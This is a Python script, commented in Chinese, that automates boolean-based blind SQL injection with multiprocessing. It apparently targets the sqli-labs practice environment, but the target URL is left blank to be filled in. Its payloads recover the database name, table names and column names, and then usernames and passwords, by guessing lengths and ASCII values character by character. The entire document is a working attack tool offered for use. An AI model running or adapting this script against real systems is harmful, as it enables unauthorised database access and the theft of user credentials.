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| import requests from multiprocessing import Pool
# 只需要修改url 和 两个payload即可 # 目标网址(不带参数) url = "" # 猜解长度使用的payload payload_len = "?id=1' and length((select database())) = {n} -- +" # payload_len = "?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database())) = {n} -- +" # 爆破表名n为长度,r为字符的ascii值 # payload_len = "?id=1' and length((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')) = {n} -- +" # 爆破字段名n为长度,r为字符的ascii值 # payload_len = "?id=1' and length((select group_concat(concat_ws('|',username,password)) from users)) = {n} -- +" # 爆破用户名和密码n为长度,r为字符的ascii值
# 枚举字符使用的payload payload_str = "?id=1' and ascii(substr((select database()),{n},1)) = {r} -- +" # payload_str = "?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{n},1)) = {r} -- +" # 爆破表名n为长度,r为字符的ascii值 # payload_str = "?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),{n},1)) = {r} -- +" # 爆破字段名n为长度,r为字符的ascii值 # payload_str = "?id=1' and ascii(substr((select group_concat(concat_ws('|',username,password)) from users),{n},1)) = {r} -- +" # 爆破用户名和密码n为长度,r为字符的ascii值 # 获取长度 def getLength(url, payload): length = 1 # 初始测试长度为1 while True: response = requests.get(url= url+payload_len.format(n=length)) # 页面中出现"You are in"则表示成功 if 'You are in...........' in response.text: print('测试长度完成,长度为:', length,) return length else: print('正在测试长度:', length) length += 1 # 测试长度递增
# 获取字符 def getChar(args): url, payload, l, n = args response = requests.get(url=url + payload_str.format(n=l, r=n)) # 页面中出现此内容则表示成功 if 'You are in...........' in response.text: return chr(n)
# 开始猜解 def main(): length = getLength(url, payload_len) print('开始猜解字符.........') str = '' for l in range(1, length + 1): pool = Pool(processes=50) # 设置并发数 results = pool.map(getChar, [(url, payload_str, l, n) for n in range(33, 126)]) pool.close() pool.join() char = next((c for c in results if c is not None), None) if char: str += char print('第', l, '个字符猜解成功:', str) return str
if __name__ == "__main__": main()